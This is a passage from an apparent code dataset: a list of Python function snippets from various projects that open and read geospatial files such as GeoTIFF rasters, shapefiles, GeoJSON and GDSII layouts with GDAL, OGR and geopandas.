self.tilesize*pixelsizex\n south = self.ominy + y*self.tilesize*pixelsizex\n north = south + self.tilesize*pixelsizex\n if not self.isepsg4326:\n # Transformation to EPSG:4326 (WGS84 datum)\n west, south = self.ct.TransformPoint(west, south)[:2]\n east, north = self.ct.TransformPoint(east, north)[:2]\n return south, west, north, east\n\n self.tileswne = rastertileswne\n else:\n self.tileswne = lambda x, y, z: (0,0,0,0)", "def open(*args, **kwargs):\n return GDALFileTileSource(*args, **kwargs)", "def open_shapefile(file_path):\n datasource = ogr.Open(file_path)\n layer = datasource.GetLayerByIndex(0)\n print(\"Opening {}\".format(file_path))\n print(\"Number of features: {}\".format(layer.GetFeatureCount()))\n return datasource", "def get_source(self, file_path, driver=None):\n if driver:\n # Use a driver to open the file\n driver = ogr.GetDriverByName(driver)\n return driver.Open(file_path, 0)\n return gdal.Open(file_path, GA_ReadOnly)", "def gdal_read_geotiff_file(sFilename_in):\n \n if os.path.exists(sFilename_in):\n pass\n else:\n print('The file does not exist!')\n return\n\n sDriverName='GTiff'\n pDriver = gdal.GetDriverByName(sDriverName) \n\n if pDriver is None:\n print (\"%s pDriver not available.\\n\" % sDriverName)\n else:\n print (\"%s pDriver IS available.\\n\" % sDriverName) \n\n pDataset = gdal.Open(sFilename_in, gdal.GA_ReadOnly)\n\n if pDataset is None:\n print(\"Couldn't open this file: \" + sFilename_in)\n sys.exit(\"Try again!\")\n else: \n pProjection = pDataset.GetProjection()\n\n pDataset.GetMetadata()\n \n ncolumn = pDataset.RasterXSize\n nrow = pDataset.RasterYSize\n nband = pDataset.RasterCount\n\n pGeotransform = pDataset.GetGeoTransform()\n dOriginX = pGeotransform[0]\n dOriginY = pGeotransform[3]\n dPixelWidth = pGeotransform[1]\n pPixelHeight = pGeotransform[5]\n\n pBand = pDataset.GetRasterBand(1)\n\n # Data type of the values\n gdal.GetDataTypeName(pBand.DataType)\n # Compute statistics if needed\n if pBand.GetMinimum() is None or pBand.GetMaximum() is None:\n pBand.ComputeStatistics(0)\n\n dMissing_value = pBand.GetNoDataValue()\n \n aData_out = pBand.ReadAsArray(0, 0, ncolumn, nrow)\n \n #we will use one of them to keep the consistency\n pSpatial_reference = osr.SpatialReference(wkt=pProjection)\n \n\n pDataset = None\n pBand = None \n pBand = None\n\n return aData_out, dPixelWidth, dOriginX, dOriginY, nrow, ncolumn, dMissing_value, pGeotransform, pProjection, pSpatial_reference", "def read_gdal_projection(dataset):\n wkt = dataset.GetProjection()\n srs = osr.SpatialReference()\n srs.ImportFromWkt(wkt)\n # src = None\n return srs", "def fromfile(file_h):\n # If given a file name, get a real handle.\n if isinstance(file_h, str):\n with open(file_h, \"rb\") as file_h:\n buf = file_h.read()\n else:\n buf = file_h.read()\n\n # If we get WKB need to wrap in memoryview(), so run through regexes.\n if isinstance(buf, bytes):\n try:\n decoded = buf.decode()\n except UnicodeDecodeError:\n pass\n else:\n if wkt_regex.match(decoded) or hex_regex.match(decoded):\n return GEOSGeometry(decoded)\n else:\n return GEOSGeometry(buf)\n\n return GEOSGeometry(memoryview(buf))", "def open(cstr, layername=None, layersql=None, extent=None, sql_dialect=None, open_for_update=False):\n ds = ogr.Open(cstr, update=open_for_update)\n if ds is None:\n raise Exception(\"Failed to open \" + cstr)\n if layersql is not None: # an sql statement will take precedence\n if extent is not None and EXTENT_WKT in layersql:\n wkt = \"'\" + extent_to_wkt(extent) + \"'\"\n layersql = layersql.replace(EXTENT_WKT, wkt)\n # restrict to ASCII encodable chars here -\n # don't know what the datasource\n # is precisely and ogr doesn't like unicode.\n layer = ds.ExecuteSQL(str(layersql), dialect=sql_dialect)\n elif layername is not None: # then a layername\n layer = ds.GetLayerByName(layername)\n else: # fallback - shapefiles etc, use first layer\n layer = ds.GetLayer(0)\n assert(layer is not None)\n\n return ds, layer", "def read_geojson(input_file):\n # Please use the python json module (imported above)\n # to solve this one.\n with open(input_file,'r') as f:\n gj = json.load(f)\n return gj", "def read_geojson(input_file):\n # Please use the python json module (imported above)\n # to solve this one.\n with open(input_file,'r') as f:\n gj = json.load(f)\n return gj", "def open_raster_file(self):\n self.log('Opening raster file as GDALRaster.')\n\n # Open raster file\n self.dataset = GDALRaster(os.path.join(self.tmpdir, self.rastername), write=True)\n\n # Make sure nodata value is set from input\n self.hist_values = []\n self.hist_bins = []\n for i, band in enumerate(self.dataset.bands):\n if self.rasterlayer.nodata is not None:\n band.nodata_value = float(self.rasterlayer.nodata)\n\n # Create band metatdata object\n bandmeta = RasterLayerBandMetadata.objects.create(\n rasterlayer=self.rasterlayer,\n band=i,\n nodata_value=band.nodata_value,\n min=band.min,\n max=band.max\n )\n\n # Prepare numpy hist values and bins\n self.hist_values.append(numpy.array(bandmeta.hist_values))\n self.hist_bins.append(numpy.array(bandmeta.hist_bins))\n\n # Store original metadata for this raster\n meta = self.rasterlayer.metadata\n\n meta.uperleftx = self.dataset.origin.x\n meta.uperlefty = self.dataset.origin.y\n meta.width = self.dataset.width\n meta.height = self.dataset.height\n meta.scalex = self.dataset.scale.x\n meta.scaley = self.dataset.scale.y\n meta.skewx = self.dataset.skew.x\n meta.skewy = self.dataset.skew.y\n meta.numbands = len(self.dataset.bands)\n meta.srs_wkt = self.dataset.srs.wkt\n meta.srid = self.dataset.srs.srid\n\n meta.save()", "def readMap(fileName, fileFormat):\n # Open file for binary-reading\n mapFormat = gdal.GetDriverByName(fileFormat)\n mapFormat.Register()\n ds = gdal.Open(fileName)\n if ds is None:\n print 'Could not open ' + fileName + '. Something went wrong!! Shutting down'\n sys.exit(1)\n # Retrieve geoTransform info\n geotrans = ds.GetGeoTransform()\n originX = geotrans[0]\n originY = geotrans[3]\n resX = geotrans[1]\n resY = geotrans[5]\n cols = ds.RasterXSize\n rows = ds.RasterYSize\n x = linspace(originX+resX/2,originX+resX/2+resX*(cols-1),cols)\n y = linspace(originY+resY/2,originY+resY/2+resY*(rows-1),rows)\n # Retrieve raster\n RasterBand = ds.GetRasterBand(1) # there's only 1 band, starting from 1\n data = RasterBand.ReadAsArray(0,0,cols,rows)\n FillVal = RasterBand.GetNoDataValue()\n RasterBand = None\n ds = None\n return x, y, data, FillVal", "def read_gds(self,\n infile,\n units='skip',\n rename={},\n layers={},\n datatypes={},\n texttypes={}):\n self._references = []\n if isinstance(infile, basestring):\n infile = open(infile, 'rb')\n close = True\n else:\n close = False\n emitted_warnings = []\n record = self._read_record(infile)\n kwargs = {}\n create_element = None\n factor = 1\n cell = None\n while record is not None:\n # LAYER\n if record[0] == 0x0d:\n kwargs['layer'] = layers.get(record[1][0], record[1][0])\n # DATATYPE\n elif record[0] == 0x0e:\n kwargs['datatype'] = datatypes.get(record[1][0], record[1][0])\n # TEXTTYPE\n elif record[0] == 0x16:\n kwargs['texttype'] = texttypes.get(record[1][0], record[1][0])\n # XY\n elif record[0] == 0x10:\n kwargs['xy'] = factor * record[1]\n # WIDTH\n elif record[0] == 0x0f:\n kwargs['width'] = factor * abs(record[1][0])\n if record[1][0] < 0 and record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Paths with absolute width value are not \"\n \"supported. Scaling these paths will also scale \"\n \"their width.\",\n stacklevel=2)\n emitted_warnings.append(record[0])\n # ENDEL\n elif record[0] == 0x11:\n if create_element is not None:\n cell.add(create_element(**kwargs))\n create_element = None\n kwargs = {}\n # BOUNDARY\n elif record[0] == 0x08:\n create_element = self._create_polygon\n # PATH\n elif record[0] == 0x09:\n create_element = self._create_path\n # TEXT\n elif record[0] == 0x0c:\n create_element = self._create_label\n # SNAME\n elif record[0] == 0x12:\n kwargs['ref_cell'] = rename.get(record[1], record[1])\n # COLROW\n elif record[0] == 0x13:\n kwargs['columns'] = record[1][0]\n kwargs['rows'] = record[1][1]\n # STRANS\n elif record[0] == 0x1a:\n kwargs['x_reflection'] = ((int(record[1][0]) & 0x8000) > 0)\n if (int(record[1][0]) &\n 0x0006) and record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Absolute magnification or rotation of \"\n \"references is not supported. Transformations will \"\n \"be interpreted as relative.\",\n stacklevel=2)\n emitted_warnings.append(record[0])\n # MAG\n elif record[0] == 0x1b:\n kwargs['magnification'] = record[1][0]\n # ANGLE\n elif record[0] == 0x1c:\n kwargs['rotation'] = record[1][0]\n # SREF\n elif record[0] == 0x0a:\n create_element = self._create_reference\n # AREF\n elif record[0] == 0x0b:\n create_element = self._create_array\n # STRNAME\n elif record[0] == 0x06:\n name = rename.get(record[1], record[1])\n cell = Cell(name, exclude_from_current=True)\n self.cell_dict[name] = cell\n # STRING\n elif record[0] == 0x19:\n kwargs['text'] = record[1]\n # ENDSTR\n elif record[0] == 0x07:\n cell = None\n # UNITS\n elif record[0] == 0x03:\n if units == 'skip':\n factor = record[1][0]\n elif units == 'import':\n self.unit = record[1][1] / record[1][0]\n self.precision = record[1][1]\n factor = record[1][0]\n elif units == 'convert':\n factor = record[1][1] / self.unit\n else:\n raise ValueError(\"[GDSPY] units must be one of 'convert', \"\n \"'import' or 'skip'.\")\n # LIBNAME\n elif record[0] == 0x02:\n self.name = record[1]\n # PRESENTATION\n elif record[0] == 0x17:\n kwargs['anchor'] = GdsLibrary._import_anchors[int(record[1][0])\n & 0x000f]\n # PATHTYPE\n elif record[0] == 0x21:\n if record[1][0] > 2:\n if 0x21 not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Path ends with custom size are not \"\n \"supported.\",\n RuntimeWarning,\n stacklevel=2)\n emitted_warnings.append(0x21)\n else:\n kwargs['ends'] = record[1][0]\n # ENDLIB\n elif record[0] == 0x04:\n for ref in self._references:\n if ref.ref_cell in self.cell_dict:\n ref.ref_cell = self.cell_dict[ref.ref_cell]\n elif ref.ref_cell in current_library.cell_dict:\n ref.ref_cell = current_library.cell_dict[ref.ref_cell]\n # Not supported\n elif (record[0] not in emitted_warnings and\n record[0] not in GdsLibrary._unused_records):\n warnings.warn(\n \"[GDSPY] Record type {0} ({1:02X}) is not \"\n \"supported.\".format(GdsLibrary._record_name[record[0]],\n record[0]),\n RuntimeWarning,\n stacklevel=2)\n emitted_warnings.append(record[0])\n record = self._read_record(infile)\n if close:\n infile.close()\n return self", "def import_file(self, *args, **kwargs):\n filename = self.file\n self.completed_layers = []\n err = GdalErrorHandler()\n gdal.PushErrorHandler(err.handler)\n gdal.UseExceptions()\n configuration_options = kwargs.get('configuration_options', [{'index': 0}])\n\n # Configuration options should be a list at this point since the importer can process multiple layers in a\n # single import\n if isinstance(configuration_options, dict):\n configuration_options = [configuration_options]\n\n data, inspector = self.open_source_datastore(filename, *args, **kwargs)\n\n datastore_layers = inspector.describe_fields()\n\n if len(datastore_layers) == 0:\n logger.debug('No Dataset found')\n\n layers_info = []\n\n # Add index for any layers configured by name\n for layer_configuration in configuration_options:\n if 'layer_name' in layer_configuration:\n lookup = 'layer_name'\n elif 'index' in layer_configuration:\n lookup = 'index'\n else:\n lookup = None\n logger.debug('could not find lookup')\n continue\n\n for datastore_layer in datastore_layers:\n if datastore_layer.get(lookup) == layer_configuration.get(lookup):\n layer_configuration.update(datastore_layer)\n layers_info.append(layer_configuration)\n\n for layer_options in layers_info:\n if layer_options['raster']:\n \"\"\"\n File is a raster, we need to convert into optimized GeoTiff\n and skip any further testing or loading into target_store\n \"\"\"\n # Increment filename to make sure target doesn't exists\n filedir, filebase = os.path.split(filename)\n outfile = '%s.tif' % os.path.splitext(filebase)[0]\n fileout = increment_filename(os.path.join(RASTER_FILES, outfile))\n raster_import(layer_options['path'], fileout)\n self.completed_layers.append([fileout, layer_options])\n else:\n target_file, _ = self.open_target_datastore(self.target_store)\n target_create_options = []\n\n # Prevent numeric field overflow for shapefiles https://trac.osgeo.org/gdal/ticket/5241\n if target_file.GetDriver().GetName() == 'PostgreSQL':\n target_create_options.append('PRECISION=NO')\n\n layer_options['modified_fields'] = {}\n layer = data.GetLayer(layer_options.get('index'))\n layer_name = layer_options.get('name', layer.GetName().lower())\n layer_type = self.get_layer_type(layer, data)\n srs = layer.GetSpatialRef()\n\n if layer_name.lower() == 'ogrgeojson':\n try:\n layer_name = os.path.splitext(os.path.basename(filename))[0].lower()\n except IndexError:\n pass\n\n layer_name = launder(str(layer_name))\n\n # default the layer to 4326 if a spatial reference is not provided\n if not srs:\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n\n # pass the srs authority code to handlers\n if srs.AutoIdentifyEPSG() == 0:\n layer_options['srs'] = '{0}:{1}'.format(srs.GetAuthorityName(None), srs.GetAuthorityCode(None))\n\n n = 0\n while True:\n n += 1\n try:\n target_layer = self.create_target_dataset(target_file, layer_name, srs, layer_type,\n options=target_create_options)\n except RuntimeError as e:\n # logger.exception('exception in creating target dataset')\n # the layer already exists in the target store, increment the name\n if 'Use the layer creation option OVERWRITE=YES to replace it.' in e.message:\n layer_name = increment(layer_name)\n\n # try 100 times to increment then break\n if n >= 100:\n break\n\n continue\n else:\n raise e\n break\n\n # adding fields to new layer\n layer_definition = ogr.Feature(layer.GetLayerDefn())\n source_fid = None\n\n wkb_field = 0\n\n for i in range(layer_definition.GetFieldCount()):\n\n field_def = layer_definition.GetFieldDefnRef(i)\n\n if field_def.GetName() == target_layer.GetFIDColumn() and field_def.GetType() != 0:\n field_def.SetType(0)\n\n if field_def.GetName() != 'wkb_geometry':\n target_layer.CreateField(field_def)\n new_name = target_layer.GetLayerDefn().GetFieldDefn(i - wkb_field).GetName()\n old_name = field_def.GetName()\n\n if new_name != old_name:\n layer_options['modified_fields'][old_name] = new_name\n\n if old_name == target_layer.GetFIDColumn() and not layer.GetFIDColumn():\n source_fid = i\n else:\n wkb_field = 1\n\n if wkb_field is not 0:\n layer.SetIgnoredFields(['wkb_geometry'])\n\n for i in range(0, layer.GetFeatureCount()):\n feature = layer.GetFeature(i)\n\n if feature and feature.geometry():\n\n if not layer.GetFIDColumn():\n feature.SetFID(-1)\n\n if feature.geometry().GetGeometryType() != target_layer.GetGeomType() and \\\n target_layer.GetGeomType() in range(4, 7):\n\n conversion_function = ogr.ForceToMultiPolygon\n\n if target_layer.GetGeomType() == 5:\n conversion_function = ogr.ForceToMultiLineString\n\n elif target_layer.GetGeomType() == 4:\n conversion_function = ogr.ForceToMultiPoint\n\n geom = ogr.CreateGeometryFromWkb(feature.geometry().ExportToWkb())\n feature.SetGeometry(conversion_function(geom))\n\n if source_fid is not None:\n feature.SetFID(feature.GetField(source_fid))\n\n try:\n target_layer.CreateFeature(feature)\n\n except:\n for field in range(0, feature.GetFieldCount()):\n if feature.GetFieldType(field) == ogr.OFTString:\n try:\n feature.GetField(field).decode('utf8')\n except UnicodeDecodeError:\n feature.SetField(field, decode(feature.GetField(field)))\n except AttributeError:\n continue\n try:\n target_layer.CreateFeature(feature)\n except err as e:\n logger.error('Create feature failed: {0}'.format(gdal.GetLastErrorMsg()))\n raise e\n\n self.completed_layers.append([target_layer.GetName(), layer_options])\n\n return self.completed_layers", "def load_image(nom):\n print(\"load_image : [\", nom, \"]\")\n fic = gdal.Open(nom)\n print(fic)\n return fic.ReadAsArray(), fic.GetGeoTransform()", "def create_gdal_gis_lyr(self, file_path, lyr_name, driver_name='GPKG', add_lyr=False):\n raise EODataDownException(\"Not Implemented\")", "def loadGeoTransform(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.GetGeoTransform()", "def load_raster(input):\n dem = gdal.Open(input)\n\n nodata = []\n layers = []\n for i in range(1, dem.RasterCount+1):\n band = dem.GetRasterBand(i)\n data = band.ReadAsArray(0, 0, dem.RasterXSize, dem.RasterYSize)\n layers.append(data)\n nodata.append(band.GetNoDataValue())\n\n if len(layers) > 1:\n layers = N.dstack(layers) \n\n info = attrdict(\n metadata=dem.GetMetadata_Dict(),\n grid=Grid.from_gdal(dem),\n nodata=nodata)\n\n return (info,layers)", "def load_from_geojson(self, filename_or_url):", "def from_featureclass(filename, **kwargs):\r\n from .io import from_featureclass\r\n gis = kwargs.pop('gis', arcgis.env.active_gis)\r\n if HASARCPY:\r\n return from_featureclass(filename=filename, **kwargs)\r\n elif isinstance(gis, GIS) and \\\r\n gis._con._auth.lower() != \"anon\":\r\n return from_featureclass(filename=filename, **kwargs)\r\n else:\r\n raise Exception(\"Cannot create the SpatialDataFrame, you must \" +\\\r\n \"have an authenticated GIS.\")", "def read(self, format=None, epsg=None):\n if not format:\n format = self.default_output\n if self.ext not in formats.VECTOR:\n raise UnsupportedFormatException(\n \"Only the following vector formats are supported: {}\".format(\n ','.join(formats.VECTOR)\n )\n )\n if self.data is None:\n self.data = geopandas.read_file(self.uri)\n if self.filters:\n self.filter_data()\n return self.transform_data(format, epsg)", "def load_loss_GDF(filename, lon, lat):\n df = pd.read_csv(filename)\n x, y = np.meshgrid(lon, lat)\n coords = [Point(xval, yval) for xval, yval in zip(x.ravel(), y.ravel())]\n \n df['geometry'] = coords\n df = gpd.GeoDataFrame(df)\n df.crs = {'init': 'epsg:4326'}\n return df", "def read(f, missing=np.nan):\n import gdal\n if f.is_zipped():\n f = unzip(f) # Unzip and return a File\n\n geotiff = gdal.Open(f.fullpath())\n if geotiff is None:\n raise RuntimeError(\"Could not open unzipped geotiff file\",f)\n\n band = geotiff.GetRasterBand(1)\n data = band.ReadAsArray(0, 0, geotiff.RasterXSize, geotiff.RasterYSize)\n\n del(geotiff)\n os.remove(f.fullpath())\n\n data[data<0] = missing\n\n return data", "def create_dat_from_shapefile(windgrid_file, DAT_header, output_file, wind_field='Vg_mph'):\n t0 = time()\n output_file = output_file + '.dat'\n print('reading windgrid')\n t1 = time()\n gdf = gpd.read_file(windgrid_file)\n create_dat_from_geodataframe(\n gdf, DAT_header, output_file, wind_field=wind_field)", "def file_open(path: str, mode: str):\n if _path_on_gcp(path):\n return tf.io.gfile.GFile(path, mode)\n return open(path, mode)", "def read_gds(\n self,\n infile,\n units=\"skip\",\n rename={},\n rename_template=\"{name}\",\n layers={},\n datatypes={},\n texttypes={},\n ):\n self._references = []\n close = True\n if hasattr(infile, \"__fspath__\"):\n infile = open(infile.__fspath__(), \"rb\")\n elif isinstance(infile, (basestring, Path)):\n infile = open(infile, \"rb\")\n else:\n close = False\n emitted_warnings = []\n kwargs = {}\n create_element = None\n factor = 1\n cell = None\n properties = {}\n attr = -1\n for record in _record_reader(infile):\n # LAYER\n if record[0] == 0x0D:\n kwargs[\"layer\"] = layers.get(record[1][0], record[1][0])\n # DATATYPE or BOXTYPE\n elif record[0] == 0x0E or record[0] == 0x2E:\n kwargs[\"datatype\"] = datatypes.get(record[1][0], record[1][0])\n # TEXTTYPE\n elif record[0] == 0x16:\n kwargs[\"texttype\"] = texttypes.get(record[1][0], record[1][0])\n # XY\n elif record[0] == 0x10:\n if \"xy\" in kwargs:\n kwargs[\"xy\"] = numpy.concatenate((kwargs[\"xy\"], factor * record[1]))\n else:\n kwargs[\"xy\"] = factor * record[1]\n # WIDTH\n elif record[0] == 0x0F:\n kwargs[\"width\"] = factor * abs(record[1][0])\n if record[1][0] < 0:\n kwargs[\"width_transform\"] = False\n # ENDEL\n elif record[0] == 0x11:\n if create_element is not None:\n el = create_element(**kwargs)\n if len(properties) > 0:\n el.properties = properties\n properties = {}\n cell.add(el)\n create_element = None\n kwargs = {}\n # BOUNDARY\n elif record[0] == 0x08:\n create_element = self._create_polygon\n # PATH\n elif record[0] == 0x09:\n create_element = self._create_path\n # BOX\n elif record[0] == 0x2D:\n create_element = self._create_polygon\n if record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] GDSII elements of type BOX are imported as polygons.\",\n stacklevel=2,\n )\n emitted_warnings.append(record[0])\n # TEXT\n elif record[0] == 0x0C:\n create_element = self._create_label\n # SNAME\n elif record[0] == 0x12:\n if record[1] in rename:\n name = rename[record[1]]\n else:\n name = rename_template.format(name=record[1])\n kwargs[\"ref_cell\"] = name\n # COLROW\n elif record[0] == 0x13:\n kwargs[\"columns\"] = record[1][0]\n kwargs[\"rows\"] = record[1][1]\n # STRANS\n elif record[0] == 0x1A:\n kwargs[\"x_reflection\"] = (int(record[1][0]) & 0x8000) > 0\n if (int(record[1][0]) & 0x0006) and record[0] not in emitted_warnings:\n warnings.warn(\n \"[GDSPY] Absolute magnification or rotation of \"\n \"references is not supported. Transformations \"\n \"will be interpreted as relative.\",\n stacklevel=2,\n )\n emitted_warnings.append(record[0])\n # MAG\n elif record[0] == 0x1B:\n kwargs[\"magnification\"] = record[1][0]\n # ANGLE\n elif record[0] == 0x1C:\n kwargs[\"rotation\"] = record[1][0]\n # SREF\n elif record[0] == 0x0A:\n create_element = self._create_reference\n # AREF\n elif record[0] == 0x0B:\n create_element = self._create_array\n # STRNAME\n elif record[0] == 0x06:\n if record[1] in rename:\n name = rename[record[1]]\n else:\n name = rename_template.format(name=record[1])\n cell = Cell(name, exclude_from_current=True)\n if name in self.cells:\n raise ValueError(\"[GDSPY] Multiple cells with name: {0} in GDSII file\".format(name))\n self.cells[name] = cell\n # STRING\n elif record[0] == 0x19:\n kwargs[\"text\"] = record[1]\n # ENDSTR\n elif record[0] == 0x07:\n cell = None\n # UNITS\n elif record[0] == 0x03:\n if units == \"skip\":\n factor = record[1][0]\n elif units == \"import\":\n self.unit = record[1][1] / record[1][0]\n self.precision = record[1][1]\n factor = record[1][0]\n elif units == \"convert\":\n factor = record[1][1] / self.unit\n else:\n raise ValueError(\n \"[GDSPY] units must be one of 'convert', 'import' or 'skip'.\"\n )\n # LIBNAME\n elif record[0] == 0x02:\n self.name = record[1]\n # PRESENTATION\n elif record[0] == 0x17:\n kwargs[\"anchor\"] = GdsLibrary._import_anchors[\n int(record[1][0]) & 0x000F\n ]\n # PATHTYPE\n elif record[0] == 0x21:\n kwargs[\"ends\"] = GdsLibrary._pathtype_dict.get(record[1][0], \"extended\")\n # BGNEXTN\n elif record[0] == 0x30:\n kwargs[\"bgnextn\"] = factor * record[1][0]\n # ENDEXTN\n elif record[0] == 0x31:\n kwargs[\"endextn\"] = factor * record[1][0]\n # ENDLIB\n elif record[0] == 0x04:\n for ref in self._references:\n if ref.ref_cell in self.cells:\n ref.ref_cell = self.cells[ref.ref_cell]\n # PROPATTR\n elif record[0] == 0x2B:\n attr = record[1][0]\n # PROPVALUE\n elif record[0] == 0x2C:\n properties[attr] = record[1]\n # Not supported\n elif (\n record[0] not in emitted_warnings\n and record[0] not in GdsLibrary._unused_records\n ):\n warnings.warn(\n \"[GDSPY] Record type {0} ({1:02X}) is not supported.\".format(\n GdsLibrary._record_name[record[0]], record[0]\n ),\n stacklevel=2,\n )\n emitted_warnings.append(record[0])\n if close:\n infile.close()\n return self", "def buffer(infile,outfile,erosion,dilatation):\n ds_in=ogr.Open( infile )\n lyr_in=ds_in.GetLayer(0)\n drv=ds_in.GetDriver()\n ds_out = drv.CreateDataSource(outfile)\n layer = ds_out.CreateLayer( lyr_in.GetLayerDefn().GetName(),lyr_in.GetSpatialRef(), ogr.wkbPolygon)\n n_fields = lyr_in.GetLayerDefn().GetFieldCount()\n for i in xrange ( lyr_in.GetLayerDefn().GetFieldCount() ):\n field_in = lyr_in.GetLayerDefn().GetFieldDefn( i )\n fielddef = ogr.FieldDefn( field_in.GetName(), field_in.GetType() ) \n layer.CreateField ( fielddef )\n \n featuredefn = layer.GetLayerDefn()\n \n for feat in lyr_in:\n geom0 = feat.GetGeometryRef()\n feature0 = feat.Clone()\n feature0.SetGeometry(geom0.Buffer(float(erosion)))\n geom = feature0.GetGeometryRef()\n feature = feature0.Clone() \n feature.SetGeometry(geom.Buffer(float(dilatation)))\n layer.CreateFeature(feature)\n del geom0\n del geom\n ds_out.Destroy()\n return 0", "def loadArray(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.ReadAsArray()", "def __init__(self, geom_input, srs=None):\n str_instance = isinstance(geom_input, str)\n\n # If HEX, unpack input to a binary buffer.\n if str_instance and hex_regex.match(geom_input):\n geom_input = memoryview(bytes.fromhex(geom_input))\n str_instance = False\n\n # Constructing the geometry,\n if str_instance:\n wkt_m = wkt_regex.match(geom_input)\n json_m = json_regex.match(geom_input)\n if wkt_m:\n if wkt_m[\"srid\"]:\n # If there's EWKT, set the SRS w/value of the SRID.\n srs = int(wkt_m[\"srid\"])\n if wkt_m[\"type\"].upper() == \"LINEARRING\":\n # OGR_G_CreateFromWkt doesn't work with LINEARRING WKT.\n # See https://trac.osgeo.org/gdal/ticket/1992.\n g = capi.create_geom(OGRGeomType(wkt_m[\"type\"]).num)\n capi.import_wkt(g, byref(c_char_p(wkt_m[\"wkt\"].encode())))\n else:\n g = capi.from_wkt(\n byref(c_char_p(wkt_m[\"wkt\"].encode())), None, byref(c_void_p())\n )\n elif json_m:\n g = self._from_json(geom_input.encode())\n else:\n # Seeing if the input is a valid short-hand string\n # (e.g., 'Point', 'POLYGON').\n OGRGeomType(geom_input)\n g = capi.create_geom(OGRGeomType(geom_input).num)\n elif isinstance(geom_input, memoryview):\n # WKB was passed in\n g = self._from_wkb(geom_input)\n elif isinstance(geom_input, OGRGeomType):\n # OGRGeomType was passed in, an empty geometry will be created.\n g = capi.create_geom(geom_input.num)\n elif isinstance(geom_input, self.ptr_type):\n # OGR pointer (c_void_p) was the input.\n g = geom_input\n else:\n raise GDALException(\n \"Invalid input type for OGR Geometry construction: %s\"\n % type(geom_input)\n )\n\n # Now checking the Geometry pointer before finishing initialization\n # by setting the pointer for the object.\n if not g:\n raise GDALException(\n \"Cannot create OGR Geometry from input: %s\" % geom_input\n )\n self.ptr = g\n\n # Assigning the SpatialReference object to the geometry, if valid.\n if srs:\n self.srs = srs\n\n # Setting the class depending upon the OGR Geometry Type\n self.__class__ = GEO_CLASSES[self.geom_type.num]", "def loadProjection(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.GetProjection()", "def read_locations(db, openfile):\n pass", "def load(self, filename):\n LIB.mnt_grid_load.argtypes = [POINTER(c_void_p), c_char_p]\n fm = filename.encode('utf-8')\n ier = LIB.mnt_grid_load(self.obj, fm)\n if ier:\n error_handler(FILE, 'load', ier)", "def _open_file(cls, *args, **kwargs):\n try:\n import tensorflow as tf\n open_file = tf.io.gfile.GFile # pragma: no cover\n except Exception: # pragma: no cover\n open_file = open\n return open_file(*args, **kwargs)", "def read_geojson(cls, path_or_json_or_string_or_url):\n assert path_or_json_or_string_or_url\n data = None\n if isinstance(path_or_json_or_string_or_url, (dict, list)):\n data = path_or_json_or_string_or_url\n try:\n data = json.loads(path_or_json_or_string_or_url)\n except ValueError:\n pass\n try:\n path = path_or_json_or_string_or_url\n if path.endswith('.gz') or path.endswith('.gzip'):\n import gzip\n contents = gzip.open(path, 'r').read().decode('utf-8')\n else:\n contents = open(path, 'r').read()\n data = json.loads(contents)\n except FileNotFoundError:\n pass\n if not data:\n import urllib.request\n with urllib.request.urlopen(path_or_json_or_string_or_url) as url:\n data = json.loads(url.read().decode())\n assert data, 'MapData accepts a valid geoJSON object, geoJSON string, path to a geoJSON file, or URL'\n return cls(cls._read_geojson_features(data))", "def isGeospatial(path):\n try:\n ds = gdal.Open(str(path), gdalconst.GA_ReadOnly)\n except Exception:\n return False\n if ds:\n if ds.GetGCPs() and ds.GetGCPProjection():\n return True\n if ds.GetProjection():\n return True\n if ds.GetGeoTransform(can_return_null=True):\n return True\n if ds.GetDriver().ShortName in {'NITF', 'netCDF'}:\n return True\n return False", "def read(self, format=None, epsg=None):\n if self.data is None:\n query, params = self.get_query()\n self.data = df_from_postgis(self.engine, query, params,\n self.geom_column, self.epsg)\n return self.transform_data(outformat=format, epsg=epsg)", "def read_gdal_coordinates(dataset, mode=\"center\"):\n coordinates_pixel = _pixel_coordinates(\n dataset.RasterXSize, dataset.RasterYSize, mode\n )\n\n geotransform = dataset.GetGeoTransform()\n coordinates = _pixel_to_map(coordinates_pixel, geotransform)\n\n return coordinates", "def gzopen(f):\n return gzip.open(f, 'rb') if f.endswith('.gz') else open(f, 'r')", "def from_file(cls, file): \n try:\n import dill as pickle\n except ImportError:\n logger.error(\"Cannot import from file, dill not installed\")\n return None\n model = pickle.load(open(file,'rb'))\n if type(model) == GeologicalModel:\n logger.info('GeologicalModel initialised from file')\n return model\n else:\n logger.error('{} does not contain a geological model'.format(file))\n return None", "def open_file(path):\n input_file = os.path.join(path)\n with open(input_file) as f:\n dataset = f.read()\n return dataset", "def check_gdf_load(gdf):\n if isinstance(gdf, (str, Path)):\n if not is_url(gdf):\n gdf = to_absolute_path(str(gdf))\n # as of geopandas 0.6.2, using the OGR CSV driver requires some add'nal\n # kwargs to create a valid geodataframe with a geometry column. see\n # https://github.com/geopandas/geopandas/issues/1234\n if str(gdf).lower().endswith(\"csv\"):\n return gpd.read_file(\n gdf, GEOM_POSSIBLE_NAMES=\"geometry\", KEEP_GEOM_COLUMNS=\"NO\"\n )\n try:\n return gpd.read_file(gdf)\n except (DriverError, CPLE_OpenFailedError):\n logging.warning(\n f\"GeoDataFrame couldn't be loaded: either {gdf} isn't a valid\"\n \" path or it isn't a valid vector file. Returning an empty\"\n \" GeoDataFrame.\"\n )\n return gpd.GeoDataFrame()\n elif isinstance(gdf, gpd.GeoDataFrame):\n return gdf\n else:\n raise ValueError(f\"{gdf} is not an accepted GeoDataFrame format.\")", "def load(src_path):\n satdat = rasterio.open(src_path)\n return satdat", "def geotiff_read(ifile,metaData):\r\n\r\n file = gdal.Open(ifile, GA_ReadOnly)\r\n\r\n projection = file.GetProjection()\r\n src = osr.SpatialReference()\r\n src.ImportFromWkt(projection)\r\n proj = src.ExportToWkt()\r\n\r\n Nx = file.RasterXSize\r\n Ny = file.RasterYSize\r\n\r\n trans = file.GetGeoTransform()\r\n\r\n dx = trans[1]\r\n dy = trans[5]\r\n\r\n if metaData == 